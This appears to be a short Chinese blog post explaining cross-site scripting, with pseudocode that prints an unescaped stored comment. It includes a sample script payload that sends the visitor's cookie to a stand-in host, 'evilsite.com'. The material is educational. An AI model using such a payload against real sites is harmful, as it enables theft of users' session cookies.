参考博客
高爽|Coder - XSS攻击及防御
PS: 这篇文章下面的评论区囧到我了, 好像不少人在评论区进行了注入测试, 哈哈.
DoubleSpout - 关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)
Cross-site Scripting (XSS) Attack
概念
XSS攻击指的是通过注入等手段让被攻击用户的浏览器执行一段恶意的代码.
比如说某个网站的评论或者发表文章的功能并没有对用户输入进行安全地处理(转义等), 那么很可能显示该输入的页面直接就加载了一段本是纯文本的JavaScript代码.
比如下面这段服务端伪代码来源, 直接输出了最后一条评论. 如果latestComment插入数据库的时候没有被合适地处理过, 直接存储起来了. 比如说<script>window.open("www.evilsite.com?param=" + document.cookie)</script>.
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
那么用户访问该页面的时候内容就变成了
<html>
<h1>Most recent comment</h1>
<script>window.open("www.evilsite.com?param=" + document.cookie)</script>
</html>
那么这段恶意代码就被执行了, evilsite网站就会收到用户关于当前网站的cookie.
网友评论